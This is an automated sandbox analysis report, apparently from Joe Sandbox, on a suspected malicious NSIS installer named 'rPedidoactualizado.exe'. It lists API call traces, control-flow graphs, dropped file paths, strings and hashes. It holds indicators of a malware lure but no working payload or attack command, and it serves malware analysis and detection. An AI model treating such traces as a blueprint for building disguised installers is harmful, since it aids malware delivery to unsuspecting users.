                                          • Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd
                                          Similarity
                                          • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                          • String ID:
                                          • API String ID: 3282139019-0
                                          • Opcode ID: 47aca452d897ee1c606fef890413e6cfedcb511d419741730bd760ecf5135d2d
                                          • Instruction ID: db2580999c41c4fe450d1ee4fd1a55221d51bf0aef153e7307bc2b2ec56299a6
                                          • Opcode Fuzzy Hash: 47aca452d897ee1c606fef890413e6cfedcb511d419741730bd760ecf5135d2d
                                          • Instruction Fuzzy Hash: 3FC1DEB2504200AFDB206F61ED48E2B3AA8EB9A745F01453FF651B11F0CB399991DB5E

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 295 403987-40399f call 406671 298 4039a1-4039b1 call 4061de 295->298 299 4039b3-4039ea call 406165 295->299 308 403a0d-403a36 call 403c5d call 405c74 298->308 304 403a02-403a08 lstrcatW 299->304 305 4039ec-4039fd call 406165 299->305 304->308 305->304 313 403ac8-403ad0 call 405c74 308->313 314 403a3c-403a41 308->314 320 403ad2-403ad9 call 4062b9 313->320 321 403ade-403b03 LoadImageW 313->321 314->313 316 403a47-403a61 call 406165 314->316 319 403a66-403a6f 316->319 319->313 322 403a71-403a75 319->322 320->321 324 403b84-403b8c call 40140b 321->324 325 403b05-403b35 RegisterClassW 321->325 326 403a87-403a93 lstrlenW 322->326 327 403a77-403a84 call 405b99 322->327 338 403b96-403ba1 call 403c5d 324->338 339 403b8e-403b91 324->339 328 403c53 325->328 329 403b3b-403b7f SystemParametersInfoW CreateWindowExW 325->329 333 403a95-403aa3 lstrcmpiW 326->333 334 403abb-403ac3 call 405b6c call 406297 326->334 327->326 332 403c55-403c5c 328->332 329->324 333->334 337 403aa5-403aaf GetFileAttributesW 333->337 334->313 341 403ab1-403ab3 337->341 342 403ab5-403ab6 call 405bb8 337->342 348 403ba7-403bc1 ShowWindow call 406601 338->348 349 403c2a-403c2b call 4053d2 338->349 339->332 341->334 341->342 342->334 354 403bc3-403bc8 call 406601 348->354 355 403bcd-403bdf GetClassInfoW 348->355 353 403c30-403c32 349->353 356 403c34-403c3a 353->356 357 403c4c-403c4e call 40140b 353->357 354->355 360 403be1-403bf1 GetClassInfoW RegisterClassW 355->360 361 403bf7-403c1a DialogBoxParamW call 40140b 355->361 356->339 362 403c40-403c47 call 40140b 356->362 357->328 360->361 366 403c1f-403c28 call 4038d7 361->366 362->339 366->332
                                          APIs
                                            • Part of subcall function 00406671: GetModuleHandleA.KERNEL32(?,00000020,?,004033DE,0000000A), ref: 00406683
                                            • Part of subcall function 00406671: GetProcAddress.KERNEL32(00000000,?), ref: 0040669E
                                          • lstrcatW.KERNEL32(1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000,00000002,C:\Users\user\AppData\Local\Temp\,75923420,"C:\Users\user\Desktop\rPedidoactualizado.exe",00000000), ref: 00403A08
                                          • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen,1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A88
                                          • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen,1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000), ref: 00403A9B
                                          • GetFileAttributesW.KERNEL32(: Completed), ref: 00403AA6
                                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen), ref: 00403AEF
                                            • Part of subcall function 004061DE: wsprintfW.USER32 ref: 004061EB
                                          • RegisterClassW.USER32(007A79C0), ref: 00403B2C
                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B44
                                          • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B79
                                          • ShowWindow.USER32(00000005,00000000), ref: 00403BAF
                                          • GetClassInfoW.USER32(00000000,RichEdit20W,007A79C0), ref: 00403BDB
                                          • GetClassInfoW.USER32(00000000,RichEdit,007A79C0), ref: 00403BE8
                                          • RegisterClassW.USER32(007A79C0), ref: 00403BF1
                                          • DialogBoxParamW.USER32(?,00000000,00403D35,00000000), ref: 00403C10
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd
                                          Similarity
                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                          • String ID: "C:\Users\user\Desktop\rPedidoactualizado.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                          • API String ID: 1975747703-3530490560
                                          • Opcode ID: d8c6d654d8461c0bab771826e12c99a28648eabf0d3796c1ab225da277d58302
                                          • Instruction ID: fbef4646fbcf09e2f3785bbd11e1a9055ea34cd93d2d0ed92f9d0f486109358d
                                          • Opcode Fuzzy Hash: d8c6d654d8461c0bab771826e12c99a28648eabf0d3796c1ab225da277d58302
                                          • Instruction Fuzzy Hash: 4D61B434200700AED320AF669D45F2B3A6CEB86745F40857FF941B51E2DB7D6901CB2D

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 369 402edd-402f2b GetTickCount GetModuleFileNameW call 405d8d 372 402f37-402f65 call 406297 call 405bb8 call 406297 GetFileSize 369->372 373 402f2d-402f32 369->373 381 403052-403060 call 402e79 372->381 382 402f6b 372->382 374 40310f-403113 373->374 388 403062-403065 381->388 389 4030b5-4030ba 381->389 384 402f70-402f87 382->384 386 402f89 384->386 387 402f8b-402f94 call 40330e 384->387 386->387 396 402f9a-402fa1 387->396 397 4030bc-4030c4 call 402e79 387->397 391 403067-40307f call 403324 call 40330e 388->391 392 403089-4030b3 GlobalAlloc call 403324 call 403116 388->392 389->374 391->389 420 403081-403087 391->420 392->389 418 4030c6-4030d7 392->418 398 402fa3-402fb7 call 405d48 396->398 399 40301d-403021 396->399 397->389 407 40302b-403031 398->407 416 402fb9-402fc0 398->416 406 403023-40302a call 402e79 399->406 399->407 406->407 409 403040-40304a 407->409 410 403033-40303d call 406764 407->410 409->384 417 403050 409->417 410->409 416->407 422 402fc2-402fc9 416->422 417->381 423 4030d9 418->423 424 4030df-4030e4 418->424 420->389 420->392 422->407 425 402fcb-402fd2 422->425 423->424 426 4030e5-4030eb 424->426 425->407 427 402fd4-402fdb 425->427 426->426 428 4030ed-403108 SetFilePointer call 405d48 426->428 427->407 429 402fdd-402ffd 427->429 432 40310d 428->432 429->389 431 403003-403007 429->431 433 403009-40300d 431->433 434 40300f-403017 431->434 432->374 433->417 433->434 434->407 435 403019-40301b 434->435 435->407
                                          APIs
                                          • GetTickCount.KERNEL32 ref: 00402EEE
                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\rPedidoactualizado.exe,00000400,?,00000006,00000008,0000000A), ref: 00402F0A
                                            • Part of subcall function 00405D8D: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\rPedidoactualizado.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D91
                                            • Part of subcall function 00405D8D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DB3
                                          • GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\rPedidoactualizado.exe,C:\Users\user\Desktop\rPedidoactualizado.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F56
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd
                                          Similarity
                                          • API ID: File$AttributesCountCreateModuleNameSizeTick
                                          • String ID: "C:\Users\user\Desktop\rPedidoactualizado.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\rPedidoactualizado.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$vy
                                          • API String ID: 4283519449-3281621571
                                          • Opcode ID: 3805bf358c9b933ceb9c43f9a1800ffe54feec6963a992abd6a8fc7691be1b71
                                          • Instruction ID: 6efc7070ea8ae83888cd6b0cd51e2fb70848d81e0c864f736895acd6ba0a04dc
                                          • Opcode Fuzzy Hash: 3805bf358c9b933ceb9c43f9a1800ffe54feec6963a992abd6a8fc7691be1b71
                                          • Instruction Fuzzy Hash: 6251C271901208ABDB20AF65DD85BAE7FA8EB05355F10807BF904B62D5DB7C8E408B9D

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 436 4062b9-4062c4 437 4062c6-4062d5 436->437 438 4062d7-4062ed 436->438 437->438 439 4062f3-406300 438->439 440 406505-40650b 438->440 439->440 441 406306-40630d 439->441 442 406511-40651c 440->442 443 406312-40631f 440->443 441->440 445 406527-406528 442->445 446 40651e-406522 call 406297 442->446 443->442 444 406325-406331 443->444 447 4064f2 444->447 448 406337-406375 444->448 446->445 452 406500-406503 447->452 453 4064f4-4064fe 447->453 450 406495-406499 448->450 451 40637b-406386 448->451 456 40649b-4064a1 450->456 457 4064cc-4064d0 450->457 454 406388-40638d 451->454 455 40639f 451->455 452->440 453->440 454->455 460 40638f-406392 454->460 463 4063a6-4063ad 455->463 461 4064b1-4064bd call 406297 456->461 462 4064a3-4064af call 4061de 456->462 458 4064d2-4064da call 4062b9 457->458 459 4064df-4064f0 lstrlenW 457->459 458->459 459->440 460->455 466 406394-406397 460->466 472 4064c2-4064c8 461->472 462->472 468 4063b2-4063b4 463->468 469 4063af-4063b1 463->469 466->455 473 406399-40639d 466->473 470 4063b6-4063d4 call 406165 468->470 471 4063ef-4063f2 468->471 469->468 479 4063d9-4063dd 470->479 477 406402-406405 471->477 478 4063f4-406400 GetSystemDirectoryW 471->478 472->459 476 4064ca 472->476 473->463 480 40648d-406493 call 40652b 476->480 482 406470-406472 477->482 483 406407-406415 GetWindowsDirectoryW 477->483 481 406474-406478 478->481 484 4063e3-4063ea call 4062b9 479->484 485 40647d-406480 479->485 480->459 481->480 487 40647a 481->487 482->481 486 406417-406421 482->486 483->482 484->481 485->480 490 406482-406488 lstrcatW 485->490 492 406423-406426 486->492 493 40643b-406451 SHGetSpecialFolderLocation 486->493 487->485 490->480 492->493 497 406428-40642f 492->497 494 406453-40646a SHGetPathFromIDListW CoTaskMemFree 493->494 495 40646c 493->495 494->481 494->495 495->482 498 406437-406439 497->498 498->481 498->493
                                          APIs
                                          • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 004063FA
                                          • GetWindowsDirectoryW.KERNEL32(: Completed,00000400,00000000,halituses,?,00405336,halituses,00000000), ref: 0040640D
                                          • SHGetSpecialFolderLocation.SHELL32(00405336,?,00000000,halituses,?,00405336,halituses,00000000), ref: 00406449
                                          • SHGetPathFromIDListW.SHELL32(?,: Completed), ref: 00406457
                                          • CoTaskMemFree.OLE32(?), ref: 00406462
                                          • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 00406488
                                          • lstrlenW.KERNEL32(: Completed,00000000,halituses,?,00405336,halituses,00000000), ref: 004064E0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd
                                          Similarity
                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                          • String ID: : Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$halituses
                                          • API String ID: 717251189-3468386958
                                          • Opcode ID: 6a252e7cfe045f166905b36660472e7fa3fa999564b1f12889f2762da509e16d
                                          • Instruction ID: 404aa91c63c37ecb41bc9170075bd2a6d7acde9a16fb3e5716bfaea1f71b207e
                                          • Opcode Fuzzy Hash: 6a252e7cfe045f166905b36660472e7fa3fa999564b1f12889f2762da509e16d
                                          • Instruction Fuzzy Hash: C0613671A00511ABDF209F24DD40ABE37A5AF45314F12813FE943BA2D0EB3C99A1CB5D

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 563 40176f-401794 call 402c41 call 405be3 568 401796-40179c call 406297 563->568 569 40179e-4017b0 call 406297 call 405b6c lstrcatW 563->569 574 4017b5-4017b6 call 40652b 568->574 569->574 578 4017bb-4017bf 574->578 579 4017c1-4017cb call 4065da 578->579 580 4017f2-4017f5 578->580 588 4017dd-4017ef 579->588 589 4017cd-4017db CompareFileTime 579->589 582 4017f7-4017f8 call 405d68 580->582 583 4017fd-401819 call 405d8d 580->583 582->583 590 40181b-40181e 583->590 591 40188d-4018b6 call 4052ff call 403116 583->591 588->580 589->588 592 401820-40185e call 406297 * 2 call 4062b9 call 406297 call 4058fd 590->592 593 40186f-401879 call 4052ff 590->593 605 4018b8-4018bc 591->605 606 4018be-4018ca SetFileTime 591->606 592->578 626 401864-401865 592->626 603 401882-401888 593->603 607 402ace 603->607 605->606 609 4018d0-4018db CloseHandle 605->609 606->609 611 402ad0-402ad4 607->611 612 4018e1-4018e4 609->612 613 402ac5-402ac8 609->613 614 4018e6-4018f7 call 4062b9 lstrcatW 612->614 615 4018f9-4018fc call 4062b9 612->615 613->607 621 401901-4022fc call 4058fd 614->621 615->621 621->611 621->613 626->603 627 401867-401868 626->627 627->593
                                          APIs
                                          • lstrcatW.KERNEL32(00000000,00000000,C:\Users\user\AppData\Local\Temp\nsx2132.tmp,C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen,?,?,00000031), ref: 004017B0
                                          • CompareFileTime.KERNEL32(-00000014,?,C:\Users\user\AppData\Local\Temp\nsx2132.tmp,C:\Users\user\AppData\Local\Temp\nsx2132.tmp,00000000,00000000,C:\Users\user\AppData\Local\Temp\nsx2132.tmp,C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen,?,?,00000031), ref: 004017D5
                                            • Part of subcall function 00406297: lstrcpynW.KERNEL32(?,?,00000400,0040343D,007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 004062A4
                                            • Part of subcall function 004052FF: lstrlenW.KERNEL32(halituses,00000000,?,759223A0,?,?,?,?,?,?,?,?,?,00403257,00000000,?), ref: 00405337
                                            • Part of subcall function 004052FF: lstrlenW.KERNEL32(00403257,halituses,00000000,?,759223A0,?,?,?,?,?,?,?,?,?,00403257,00000000), ref: 00405347
                                            • Part of subcall function 004052FF: lstrcatW.KERNEL32(halituses,00403257,00403257,halituses,00000000,?,759223A0), ref: 0040535A
                                            • Part of subcall function 004052FF: SetWindowTextW.USER32(halituses,halituses), ref: 0040536C
                                            • Part of subcall function 004052FF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405392
                                            • Part of subcall function 004052FF: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053AC
                                            • Part of subcall function 004052FF: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053BA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd
                                          Similarity
                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                          • String ID: C:\Users\user\AppData\Local\Temp\nsx2132.tmp$C:\Users\user\AppData\Local\Temp\nsx2132.tmp$C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen
                                          • API String ID: 1941528284-264205256
                                          • Opcode ID: 1aff087000cc3e25554f0ed6ab8061021059107db776a0829eeff450dd20a923
                                          • Instruction ID: 2a95d3c8b727dc51f4ea131d05094547f585338353aa12d45a2270be549af1c7
                                          • Opcode Fuzzy Hash: 1aff087000cc3e25554f0ed6ab8061021059107db776a0829eeff450dd20a923
                                          • Instruction Fuzzy Hash: C141B471910514BACF107BA5DD45DAF3A79EF45328B20823FF512B10E1DB3C4A519B6E

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 629 4052ff-405314 630 40531a-40532b 629->630 631 4053cb-4053cf 629->631 632 405336-405342 lstrlenW 630->632 633 40532d-405331 call 4062b9 630->633 635 405344-405354 lstrlenW 632->635 636 40535f-405363 632->636 633->632 635->631 637 405356-40535a lstrcatW 635->637 638 405372-405376 636->638 639 405365-40536c SetWindowTextW 636->639 637->636 640 405378-4053ba SendMessageW * 3 638->640 641 4053bc-4053be 638->641 639->638 640->641 641->631 642 4053c0-4053c3 641->642 642->631
                                          APIs
                                          • lstrlenW.KERNEL32(halituses,00000000,?,759223A0,?,?,?,?,?,?,?,?,?,00403257,00000000,?), ref: 00405337
                                          • lstrlenW.KERNEL32(00403257,halituses,00000000,?,759223A0,?,?,?,?,?,?,?,?,?,00403257,00000000), ref: 00405347
                                          • lstrcatW.KERNEL32(halituses,00403257,00403257,halituses,00000000,?,759223A0), ref: 0040535A
                                          • SetWindowTextW.USER32(halituses,halituses), ref: 0040536C
                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405392
                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053AC
                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 004053BA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd
                                          Similarity
                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                          • String ID: halituses
                                          • API String ID: 2531174081-2845610232
                                          • Opcode ID: d3653f13458b7317840ca79dc32cb7632281d068d931c5ba13ed513af890554b
                                          • Instruction ID: 8b92f55a8d4b67b8ae829402156b3fb25f72412c241cd3f1eea2d9b1658803e5
                                          • Opcode Fuzzy Hash: d3653f13458b7317840ca79dc32cb7632281d068d931c5ba13ed513af890554b
                                          • Instruction Fuzzy Hash: 66216071900618BACB11AFA5DD859CFBF78EF85350F10846AF904B62A0C7B94A50CF98

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 643 406601-406621 GetSystemDirectoryW 644 406623 643->644 645 406625-406627 643->645 644->645 646 406638-40663a 645->646 647 406629-406632 645->647 649 40663b-40666e wsprintfW LoadLibraryExW 646->649 647->646 648 406634-406636 647->648 648->649
                                          APIs
                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406618
                                          • wsprintfW.USER32 ref: 00406653
                                          • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406667
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
